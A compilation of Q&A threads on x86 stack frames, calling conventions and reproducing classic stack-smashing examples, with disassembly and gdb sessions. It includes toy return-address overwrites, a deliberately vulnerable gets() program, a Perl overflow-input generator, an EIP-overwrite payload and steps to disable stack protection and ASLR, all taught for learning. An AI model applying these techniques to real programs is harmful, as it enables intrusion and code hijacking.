I learn about stack frame. But if I'm right, before function is called, that function's arguments are pushed into stack frame.
For example,
int main(void)
{
printf("hi everyone %d \n", 3);
return 0;
}
In this case, in the main stack frame, "Hi everyone %d \n" 's address, and 3 should be pushed and then printf must be called, if i'm right.
But there is no such instruction when I use gdb.
I'm studying about String Format Vulnerability. But what I write above didn't happen. What's wrong with me?
For your simple program:
#include <stdio.h>
int main(void)
{
printf("hi everyone %d \n", 3);
return 0;
}
compiled as gcc -g -ansi -pedantic -Wall test.c -o test (on an Ubuntu 14.04 system using gcc version 4.8.4) it appears that the parameters to printf are being passed in registers. Setting a break point on the printf command and disassembling yields the following:
Dump of assembler code for function main:
0x000000000040052d <+0>: push rbp
0x000000000040052e <+1>: mov rbp,rsp
=> 0x0000000000400531 <+4>: mov esi,0x3
0x0000000000400536 <+9>: mov edi,0x4005d4
0x000000000040053b <+14>: mov eax,0x0
0x0000000000400540 <+19>: call 0x400410 <printf#plt>
0x0000000000400545 <+24>: mov eax,0x0
0x000000000040054a <+29>: pop rbp
0x000000000040054b <+30>: ret
End of assembler dump.
We can see that the value 3 (which in this case is encoded into the instruction as a literal) is begin moved into the %esi register and your string's address is being moved into the %edi register. You can verify this by looking at the memory:
(gdb) x/16cb 0x4005d4
0x4005d4: 104 'h' 105 'i' 32 ' ' 101 'e' 118 'v' 101 'e' 114 'r' 121 'y'
0x4005dc: 111 'o' 110 'n' 101 'e' 32 ' ' 37 '%' 100 'd' 32 ' ' 10 '\n
Also, you can examine the stack and base pointers, and you will notice that in this simple program the stack is not used:
(gdb) print $rbp
$4 = (void *) 0x7fffffffe460
(gdb) print $rsp
$5 = (void *) 0x7fffffffe460
as $rpb and $rsp both have the same value.
Hope this helps.
-T.
This article about how the GCC compiler can optimize code to replace some types of call with equivalent, but not identical, operations may help.
The example you gave would be a prime target for this sort of optimization.
Following the __cdecl calling convention (the default for most compilers) https://en.wikipedia.org/wiki/X86_calling_conventions#cdecl we can see what the compiler might produce.
First the caller makes a stack frame.
push ebp
mov ebp, esp
What the above code does is simple. First it pushes the current value of ebp to the stack, then it moves the value of the stack pointer to ebp.
Now it pushes the function's arguments to the stack from right to left.
push 3; The number
push ?; Placeholder for the pointer to the string
Now it calls the function.
call ?; Placeholder for the address of printf
When the function returns we clean the stack by simply resetting the stack frame
mov esp, ebp
and restoring ebp
pop ebp
Just looking at some of the code that visual studio 2015 produced for me I can confirm there are variations to this calling convention, but this is the general idea of stack frames.
Related
I'm in the process of trying to understand the stack mechanisms.
From the theory I have seen, before a function is called, its arguments are pushed onto the stack.
However when calling printf in the code below, none of them are pushed:
#include<stdio.h>
int main(){
char *s = " test string";
printf("Print this: %s and this %s \n", s, s);
return 1;
}
I've put a break in gdb to the printf instruction, and when displaying the stack, none of the 3 arguments are pushed onto the stack.
The only thing pushed to the stack is the string address s as can be seen in the disassembled code below:
0x000000000040052c <+0>: push %rbp
0x000000000040052d <+1>: mov %rsp,%rbp
0x0000000000400530 <+4>: sub $0x10,%rsp
0x0000000000400534 <+8>: movq $0x400604,-0x8(%rbp) // variable pushed on the stack
0x000000000040053c <+16>: mov -0x8(%rbp),%rdx
0x0000000000400540 <+20>: mov -0x8(%rbp),%rax
0x0000000000400544 <+24>: mov %rax,%rsi
0x0000000000400547 <+27>: mov $0x400611,%edi
0x000000000040054c <+32>: mov $0x0,%eax
0x0000000000400551 <+37>: callq 0x400410 <printf#plt>
0x0000000000400556 <+42>: mov $0x1,%eax
0x000000000040055b <+47>: leaveq
Actually, the only argument appearing so far in the disassembled code is when "Print this: %s and this %s \n" is put in %edi...
0x0000000000400547 <+27>: mov $0x400611,%edi
SO my question is: why am i not seeing 3 push instructions for each of my three arguments ?
uname -a:
3.8.0-31-generic #46-Ubuntu SMP Tue Sep 10 20:03:44 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
On 64 bits Linux x86-64 systems, the x86-64 ABI (x86-64 Application Binary Interface) does not push arguments on stack, but uses some registers (this calling convention is slightly faster).
If you pass many arguments -e.g. a dozen- some of them gets pushed on the stack.
Perhaps read first the wikipage on x86 calling conventions before reading the x86-64 ABI specifications.
For variadic functions like printf details are a bit scary.
Depending on your compiler, you will need to allocate space on the heap for your pointer 's'.
Instead of
char *s;
use
char s[300];
to allocate 300 bytes of room
Otherwise 's' is simply pointing up the stack - which can be random
This could be partly why you are not seeing PUSH instructions.
Also, I don't see why there should be a PUSH instruction for the pointers required in printf? The assembler is simply copying (MOV) the value of the pointers
I am trying to reproduce the stackoverflow results that I read from Aleph One's article "smashing the stack for fun and profit"(can be found here:http://insecure.org/stf/smashstack.html).
Trying to overwrite the return address doesn't seem to work for me.
C code:
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
//Trying to overwrite return address
ret = buffer1 + 12;
(*ret) = 0x4005da;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
disassembled main:
(gdb) disassemble main
Dump of assembler code for function main:
0x00000000004005b0 <+0>: push %rbp
0x00000000004005b1 <+1>: mov %rsp,%rbp
0x00000000004005b4 <+4>: sub $0x10,%rsp
0x00000000004005b8 <+8>: movl $0x0,-0x4(%rbp)
0x00000000004005bf <+15>: mov $0x3,%edx
0x00000000004005c4 <+20>: mov $0x2,%esi
0x00000000004005c9 <+25>: mov $0x1,%edi
0x00000000004005ce <+30>: callq 0x400564 <function>
0x00000000004005d3 <+35>: movl $0x1,-0x4(%rbp)
0x00000000004005da <+42>: mov -0x4(%rbp),%eax
0x00000000004005dd <+45>: mov %eax,%esi
0x00000000004005df <+47>: mov $0x4006dc,%edi
0x00000000004005e4 <+52>: mov $0x0,%eax
0x00000000004005e9 <+57>: callq 0x400450 <printf#plt>
0x00000000004005ee <+62>: leaveq
0x00000000004005ef <+63>: retq
End of assembler dump.
I have hard coded the return address to skip the x=1; code line, I have used a hard coded value from the disassembler(address : 0x4005da). The intent of this exploit is to print 0, but instead it is printing 1.
I have a very strong feeling that "ret = buffer1 + 12;" is not the address of the return address. If this is the case, how can I determine the return address, is gcc allocating more memory between the return address and the buffer.
Here's a guide I wrote for a friend a while back on performing a buffer overflow attack using gets. It goes over how to get the return address and how to use it to write over the old one:
Our knowledge of the stack tells us that the return address appears on the stack after the buffer you're trying to overflow. However, how far after the buffer the return address appears depends on the architecture you're using. In order to determine this, first write a simple program and inspect the assembly:
C code:
void function()
{
char buffer[4];
}
int main()
{
function();
}
Assembly (abridged):
function:
pushl %ebp
movl %esp, %ebp
subl $16, %esp
leave
ret
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
call function
...
There are several tools that you can use to inspect the assembly code. First, of course, is
compiling straight to assembly output from gcc using gcc -S main.c. This can be difficult to read since there are little to no hints for what code corresponds to the original C code. Additionally, there is a lot of boilerplate code that can be difficult to sift through. Another tool to consider is gdbtui. The benefit of using gdbtui is that you can inspect the assembly source while running the program and manually inspect the stack throughout the execution of the program. However, it has a steep learning curve.
The assembly inspection program that I like best is objdump. Running objdump -dS a.out gives the assembly source with the context from the original C source code. Using objdump, on my computer the offset of the return address from the character buffer is 8 bytes.
This function function takes the return address and increments 7 to it. The instruction that
the return address originally pointed to is 7 bytes in length, so adding 7 makes the return address point to the instruction immediately after the assignment.
In the example below, I overwrite the return address to skip the instruction x = 1.
simple C program:
void function()
{
char buffer[4];
/* return address is 8 bytes beyond the start of the buffer */
int *ret = buffer + 8;
/* assignment instruction we want to skip is 7 bytes long */
(*ret) += 7;
}
int main()
{
int x = 0;
function();
x = 1;
printf("%d\n",x);
}
Main function (x = 1 at 80483af is seven bytes long):
8048392: 8d4c2404 lea 0x4(%esp),%ecx
8048396: 83e4f0 and $0xfffffff0,%esp
8048399: ff71fc pushl -0x4(%ecx)
804839c: 55 push %ebp
804839d: 89e5 mov %esp,%ebp
804839f: 51 push %ecx
80483a0: 83ec24 sub $0x24,%esp
80483a3: c745f800000000 movl $0x0,-0x8(%ebp)
80483aa: e8c5ffffff call 8048374 <function>
80483af: c745f801000000 movl $0x1,-0x8(%ebp)
80483b6: 8b45f8 mov -0x8(%ebp),%eax
80483b9: 89442404 mov %eax,0x4(%esp)
80483bd: c70424a0840408 movl $0x80484a0,(%esp)
80483c4: e80fffffff call 80482d8 <printf#plt>
80483c9: 83c424 add $0x24,%esp
80483cc: 59 pop %ecx
80483cd: 5d pop %ebp
We know where the return address is and we have demonstrated that changing it can affect the
code that is run. A buffer overflow can do the same thing by using gets and inputing the right character string so that the return address is overwritten with a new address.
In a new example below we have a function function which has a buffer filled using gets. We also have a function uncalled which never gets called. With the correct input, we can run uncalled.
#include <stdio.h>
#include <stdlib.h>
void uncalled()
{
puts("uh oh!");
exit(1);
}
void function()
{
char buffer[4];
gets(buffer);
}
int main()
{
function();
puts("program secure");
}
To run uncalled, inspect the executable using objdump or similar to find the address of the entry point of uncalled. Then append the address to the input buffer in the right place so that it overwrites the old return address. If your computer is little-endian (x86, etc.) , you need to swap the endianness of the address.
In order to do this correctly, I have a simple perl script below, which generates the input that will cause the buffer overflow that will overwrite the return address. It takes two arguments, first it takes the new return address, and second it takes the distance (in bytes) from the beginning of the buffer to the return address location.
#!/usr/bin/perl
print "x"x#ARGV[1]; # fill the buffer
print scalar reverse pack "H*", substr("0"x8 . #ARGV[0] , -8); # swap endian of input
print "\n"; # new line to end gets
You need to examine the stack to determine if buffer1+12 is actually the right address to be modifying. This sort of stuff isn't exactly very portable.
I'd probably also place some eye catchers in the code so you can see where the buffers are on the stack in relation to the return address:
char buffer1[5] = "1111";
char buffer2[10] = "2222";
You can figure this out by printing out the stack. Add code like this:
int* pESP;
__asm mov pESP, esp
The __asm directive is Visual Studio specific. Once you have the address of the stack you can print it out and see what is in there. Note that the stack will change when you do things or make calls, so you have to save the whole block of memory at once by first copying the memory at the stack address to an array, then you print out the array.
What you will find is all kinds of garbage having to do with the stack frame and various runtime checks. By default VS will put guard code in the stack to prevent exactly what you are trying to do. If you print out the assembly listing for "function" you will see this. You need to set a compiler switches to turn all this stuff off.
As an alternative to the methods suggested in other answers, you can figure this sort of thing out using gdb. To make the output a bit easier to read, I remove the buffer2 variable, and change buffer1 to 8 bytes so things are more aligned. We will also compile in 32 bit more do make it easier to read the addresses, and turn debugging on(gcc -m32 -g).
void function(int a, int b, int c) {
char buffer1[8];
char *ret;
so let's print the address of buffer1:
(gdb) print &buffer1
$1 = (char (*)[8]) 0xbffffa40
then let's print a bit past that and see what's on the stack.
(gdb) x/16x 0xbffffa40
0xbffffa40: 0x00001000 0x00000000 0xfecf25c3 0x00000003
0xbffffa50: 0x00000000 0xbffffb50 0xbffffa88 0x00001f3b
0xbffffa60: 0x00000001 0x00000002 0x00000003 0x00000000
0xbffffa70: 0x00000003 0x00000002 0x00000001 0x00001efc
Do a backtrace to see where the return address should be pointing:
(gdb) bt
#0 function (a=1, b=2, c=3) at foo.c:18
#1 0x00001f3b in main () at foo.c:26
and sure enough, there it is at 0xbffffa5b:
(gdb) x/x 0xbffffa5b
0xbffffa5b: 0x001f3bbf
I am trying to make the buffer exploitation example (example3.c from http://insecure.org/stf/smashstack.html) work on Debian Lenny 2.6 version. I know the gcc version and the OS version is different than the one used by Aleph One. I have disabled any stack protection mechanisms using -fno-stack-protector and sysctl -w kernel.randomize_va_space=0 arguments. To account for the differences in my setup and Aleph One's I introduced two parameters : offset1 -> Offset from buffer1 variable to the return address and offset2 -> how many bytes to jump to skip a statement. I tried to figure out these parameters by analyzing assembly code but was not successful. So, I wrote a shell script that basically runs the buffer overflow program with simultaneous values of offset1 and offset2 from (1-60). But much to my surprise I am still not able to break this program. It would be great if someone can guide me for the same. I have attached the code and assembly output for consideration. Sorry for the really long post :)
Thanks.
// Modified example3.c from Aleph One paper - Smashing the stack
void function(int a, int b, int c, int offset1, int offset2) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = (int *)buffer1 + offset1;// how far is return address from buffer ?
(*ret) += offset2; // modify the value of return address
}
int main(int argc, char* argv[]) {
int x;
x = 0;
int offset1 = atoi(argv[1]);
int offset2 = atoi(argv[2]);
function(1,2,3, offset1, offset2);
x = 1; // Goal is to skip this statement using buffer overflow
printf("X : %d\n",x);
return 0;
}
-----------------
// Execute the buffer overflow program with varying offsets
#!/bin/bash
for ((i=1; i<=60; i++))
do
for ((j=1; j<=60; j++))
do
echo "`./test $i $j`"
done
done
-- Assembler output
(gdb) disassemble main
Dump of assembler code for function main:
0x080483c2 <main+0>: lea 0x4(%esp),%ecx
0x080483c6 <main+4>: and $0xfffffff0,%esp
0x080483c9 <main+7>: pushl -0x4(%ecx)
0x080483cc <main+10>: push %ebp
0x080483cd <main+11>: mov %esp,%ebp
0x080483cf <main+13>: push %ecx
0x080483d0 <main+14>: sub $0x24,%esp
0x080483d3 <main+17>: movl $0x0,-0x8(%ebp)
0x080483da <main+24>: movl $0x3,0x8(%esp)
0x080483e2 <main+32>: movl $0x2,0x4(%esp)
0x080483ea <main+40>: movl $0x1,(%esp)
0x080483f1 <main+47>: call 0x80483a4 <function>
0x080483f6 <main+52>: movl $0x1,-0x8(%ebp)
0x080483fd <main+59>: mov -0x8(%ebp),%eax
0x08048400 <main+62>: mov %eax,0x4(%esp)
0x08048404 <main+66>: movl $0x80484e0,(%esp)
0x0804840b <main+73>: call 0x80482d8 <printf#plt>
0x08048410 <main+78>: mov $0x0,%eax
0x08048415 <main+83>: add $0x24,%esp
0x08048418 <main+86>: pop %ecx
0x08048419 <main+87>: pop %ebp
0x0804841a <main+88>: lea -0x4(%ecx),%esp
0x0804841d <main+91>: ret
End of assembler dump.
(gdb) disassemble function
Dump of assembler code for function function:
0x080483a4 <function+0>: push %ebp
0x080483a5 <function+1>: mov %esp,%ebp
0x080483a7 <function+3>: sub $0x20,%esp
0x080483aa <function+6>: lea -0x9(%ebp),%eax
0x080483ad <function+9>: add $0x30,%eax
0x080483b0 <function+12>: mov %eax,-0x4(%ebp)
0x080483b3 <function+15>: mov -0x4(%ebp),%eax
0x080483b6 <function+18>: mov (%eax),%eax
0x080483b8 <function+20>: lea 0x7(%eax),%edx
0x080483bb <function+23>: mov -0x4(%ebp),%eax
0x080483be <function+26>: mov %edx,(%eax)
0x080483c0 <function+28>: leave
0x080483c1 <function+29>: ret
End of assembler dump.
The disassembly for function you provided seems to use hardcoded values of offset1 and offset2, contrary to your C code.
The address for ret should be calculated using byte/char offsets: ret = (int *)(buffer1 + offset1), otherwise you'll get hit by pointer math (especially in this case, when your buffer1 is not at a nice aligned offset from the return address).
offset1 should be equal to 0x9 + 0x4 (the offset used in lea + 4 bytes for the push %ebp). However, this can change unpredictably each time you compile - the stack layout might be different, the compiler might create some additional stack alignment, etc.
offset2 should be equal to 7 (the length of the instruction you're trying to skip).
Note that you're getting a little lucky here - the function uses the cdecl calling convention, which means the caller is responsible for removing arguments off the stack after returning from the function, which normally looks like this:
push arg3
push arg2
push arg1
call func
add esp, 0Ch ; remove as many bytes as were used by the pushed arguments
Your compiler chose to combine this correction with the one after printf, but it could also decide to do this after your function call. In this case the add esp, <number> instruction would be present between your return address and the instruction you want to skip - you can probably imagine that this would not end well.
I am working on ubuntu 12.04 and 64 bit machine. I was reading a good book on buffer overflows and while playing with one example found one strange moment.
I have this really simple C code:
void getInput (void){
char array[8];
gets (array);
printf("%s\n", array);
}
main() {
getInput();
return 0;
}
in the file overflow.c
I compile it with 32 bit flag cause all example in the book assumed 32 bit machine, I do it like this
gcc -fno-stack-protector -g -m32 -o ./overflow ./overflow.c
In the code char array was only 8 bytes but looking at disassembly I found that that array starts 16 bytes away from saved EBP on the stack, so I executed this line:
printf "aaaaaaaaaaaaaaaaaaaa\x10\x10\x10\x20" | ./overflow
And got:
aaaaaaaaaaaaaaaaaaaa
Segmentation fault (core dumped)
Then I opened core file:
gdb ./overflow core
#0 0x20101010 in ?? ()
(gdb) info registers
eax 0x19 25
ecx 0xffffffff -1
edx 0xf77118b8 -143583048
ebx 0xf770fff4 -143589388
esp 0xffef6370 0xffef6370
ebp 0x61616161 0x61616161
esi 0x0 0
edi 0x0 0
eip 0x20101010 0x20101010
As you see EIP in fact got new value, which I wanted. BUT when I want to put some useful values like this 0x08048410
printf "aaaaaaaaaaaaaaaaaaaa\x10\x84\x04\x08" | ./overflow
Program crashes as usual but than something strange happens when I'm trying to observe the value in EIP register:
#0 0xf765be1f in ?? () from /lib/i386-linux-gnu/libc.so.6
(gdb) info registers
eax 0x61616151 1633771857
ecx 0xf77828c4 -143120188
edx 0x1 1
ebx 0xf7780ff4 -143126540
esp 0xff92dffc 0xff92dffc
ebp 0x61616161 0x61616161
esi 0x0 0
edi 0x0 0
eip 0xf765be1f 0xf765be1f
Suddenly EIP start to look like this 0xf765be1f, it doesn't look like 0x08048410. In fact I noticed that it's enough to put any hexadecimal value starting from 0 to get this crumbled EIP value. Do you know why this might happen? Is it because I'm on 64 bit machine?
UPD
Well guys in comments asked for more information, here is the disassembly of getInput function:
(gdb) disas getInput
Dump of assembler code for function getInput:
0x08048404 <+0>: push %ebp
0x08048405 <+1>: mov %esp,%ebp
0x08048407 <+3>: sub $0x28,%esp
0x0804840a <+6>: lea -0x10(%ebp),%eax
0x0804840d <+9>: mov %eax,(%esp)
0x08048410 <+12>: call 0x8048310 <gets#plt>
0x08048415 <+17>: lea -0x10(%ebp),%eax
0x08048418 <+20>: mov %eax,(%esp)
0x0804841b <+23>: call 0x8048320 <puts#plt>
0x08048420 <+28>: leave
0x08048421 <+29>: ret
Perhaps code at 0x08048410 was executed, and jumped to the area of 0xf765be1f.
What's in this address? I guess it's a function (libC?), so you can examine its assembly code and see what it would do.
Also note that in the successful run, you managed to overrun EBP, not EIP. EBP contains 0x61616161, which is aaaa, and EIP contains 0x20101010, which is \n\n\n. It seems like the corrupt EBP indirectly got EIP corrupt.
Try to make the overrun 4 bytes longer, and then it should overrun the return address too.
This is probably due to the fact that modern OS (Linux does at least, I don't know about Windows) and modern libc have mechanisms that do not allow code found in stack to be executed.
Buffer overflow is invoking undefined behavior, therefore anything can happen. Theorizing what might happen is futile.
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = buffer1 + 12;
(*ret) += 8;//why is it 8??
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
The above demo is from here:
http://insecure.org/stf/smashstack.html
But it's not working here:
D:\test>gcc -Wall -Wextra hw.cpp && a.exe
hw.cpp: In function `void function(int, int, int)':
hw.cpp:6: warning: unused variable 'buffer2'
hw.cpp: At global scope:
hw.cpp:4: warning: unused parameter 'a'
hw.cpp:4: warning: unused parameter 'b'
hw.cpp:4: warning: unused parameter 'c'
1
And I don't understand why it's 8 though the author thinks:
A little math tells us the distance is
8 bytes.
My gdb dump as called:
Dump of assembler code for function main:
0x004012ee <main+0>: push %ebp
0x004012ef <main+1>: mov %esp,%ebp
0x004012f1 <main+3>: sub $0x18,%esp
0x004012f4 <main+6>: and $0xfffffff0,%esp
0x004012f7 <main+9>: mov $0x0,%eax
0x004012fc <main+14>: add $0xf,%eax
0x004012ff <main+17>: add $0xf,%eax
0x00401302 <main+20>: shr $0x4,%eax
0x00401305 <main+23>: shl $0x4,%eax
0x00401308 <main+26>: mov %eax,0xfffffff8(%ebp)
0x0040130b <main+29>: mov 0xfffffff8(%ebp),%eax
0x0040130e <main+32>: call 0x401b00 <_alloca>
0x00401313 <main+37>: call 0x4017b0 <__main>
0x00401318 <main+42>: movl $0x0,0xfffffffc(%ebp)
0x0040131f <main+49>: movl $0x3,0x8(%esp)
0x00401327 <main+57>: movl $0x2,0x4(%esp)
0x0040132f <main+65>: movl $0x1,(%esp)
0x00401336 <main+72>: call 0x4012d0 <function>
0x0040133b <main+77>: movl $0x1,0xfffffffc(%ebp)
0x00401342 <main+84>: mov 0xfffffffc(%ebp),%eax
0x00401345 <main+87>: mov %eax,0x4(%esp)
0x00401349 <main+91>: movl $0x403000,(%esp)
0x00401350 <main+98>: call 0x401b60 <printf>
0x00401355 <main+103>: leave
0x00401356 <main+104>: ret
0x00401357 <main+105>: nop
0x00401358 <main+106>: add %al,(%eax)
0x0040135a <main+108>: add %al,(%eax)
0x0040135c <main+110>: add %al,(%eax)
0x0040135e <main+112>: add %al,(%eax)
End of assembler dump.
Dump of assembler code for function function:
0x004012d0 <function+0>: push %ebp
0x004012d1 <function+1>: mov %esp,%ebp
0x004012d3 <function+3>: sub $0x38,%esp
0x004012d6 <function+6>: lea 0xffffffe8(%ebp),%eax
0x004012d9 <function+9>: add $0xc,%eax
0x004012dc <function+12>: mov %eax,0xffffffd4(%ebp)
0x004012df <function+15>: mov 0xffffffd4(%ebp),%edx
0x004012e2 <function+18>: mov 0xffffffd4(%ebp),%eax
0x004012e5 <function+21>: movzbl (%eax),%eax
0x004012e8 <function+24>: add $0x5,%al
0x004012ea <function+26>: mov %al,(%edx)
0x004012ec <function+28>: leave
0x004012ed <function+29>: ret
In my case the distance should be - = 5,right?But it seems not working..
Why function needs 56 bytes for local variables?( sub $0x38,%esp )
As joveha pointed out, the value of EIP saved on the stack (return address) by the call instruction needs to be incremented by 7 bytes (0x00401342 - 0x0040133b = 7) in order to skip the x = 1; instruction (movl $0x1,0xfffffffc(%ebp)).
You are correct that 56 bytes are being reserved for local variables (sub $0x38,%esp), so the missing piece is how many bytes past buffer1 on the stack is the saved EIP.
A bit of test code and inline assembly tells me that the magic value is 28 for my test. I cannot provide a definitive answer as to why it is 28, but I would assume the compiler is adding padding and/or stack canaries.
The following code was compiled using GCC 3.4.5 (MinGW) and tested on Windows XP SP3 (x86).
unsigned long get_ebp() {
__asm__("pop %ebp\n\t"
"movl %ebp,%eax\n\t"
"push %ebp\n\t");
}
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
/* distance in bytes from buffer1 to return address on the stack */
printf("test %d\n", ((get_ebp() + 4) - (unsigned long)&buffer1));
ret = (int *)(buffer1 + 28);
(*ret) += 7;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
I could have just as easily used gdb to determine this value.
(compiled w/ -g to include debug symbols)
(gdb) break function
...
(gdb) run
...
(gdb) p $ebp
$1 = (void *) 0x22ff28
(gdb) p &buffer1
$2 = (char (*)[5]) 0x22ff10
(gdb) quit
(0x22ff28 + 4) - 0x22ff10 = 28
(ebp value + size of word) - address of buffer1 = number of bytes
In addition to Smashing The Stack For Fun And Profit, I would suggest reading some of the articles I mentioned in my answer to a previous question of yours and/or other material on the subject. Having a good understanding of exactly how this type of exploit works should help you write more secure code.
It's hard to predict what buffer1 + 12 really points to. Your compiler can put buffer1 and buffer2 in any location on the stack it desires, even going as far as to not save space for buffer2 at all. The only way to really know where buffer1 goes is to look at the assembler output of your compiler, and there's a good chance it would jump around with different optimization settings or different versions of the same compiler.
I do not test the code on my own machine yet, but have you taken memory alignment into consideration?
Try to disassembly the code with gcc. I think a assembly code may give you a further understanding of the code. :-)
This code prints out 1 as well on OpenBSD and FreeBSD, and gives a segmentation fault on Linux.
This kind of exploit is heavily dependent on both the instruction set of the particular machine, and the calling conventions of the compiler and operating system. Everything about the layout of the stack is defined by the implementation, not the C language. The article assumes Linux on x86, but it looks like you're using Windows, and your system could be 64-bit, although you can switch gcc to 32-bit with -m32.
The parameters you'll have to tweak are 12, which is the offset from the tip of the stack to the return address, and 8, which is how many bytes of main you want to jump over. As the article says, you can use gdb to inspect the disassembly of the function to see (a) how far the stack gets pushed when you call function, and (b) the byte offsets of the instructions in main.
The +8 bytes part is by how much he wants the saved EIP to the incremented with. The EIP was saved so the program could return to the last assignment after the function is done - now he wants to skip over it by adding 8 bytes to the saved EIP.
So all he tries to is to "skip" the
x = 1;
In your case the saved EIP will point to 0x0040133b, the first instruction after function returns. To skip the assignment you need to make the saved EIP point to 0x00401342. That's 7 bytes.
It's really a "mess with RET EIP" rather than an buffer overflow example.
And as far as the 56 bytes for local variables goes, that could be anything your compiler comes up with like padding, stack canaries, etc.
Edit:
This shows how difficult it is to make buffer overflows examples in C. The offset of 12 from buffer1 assumes a certain padding style and compile options. GCC will happily insert stack canaries nowadays (which becomes a local variable that "protects" the saved EIP) unless you tell it not to. Also, the new address he wants to jump to (the start instruction for the printf call) really has to be resolved manually from assembly. In his case, on his machie, with his OS, with his compiler, on that day.... it was 8.
You're compiling a C program with the C++ compiler. Rename hw.cpp to hw.c and you'll find it will compile.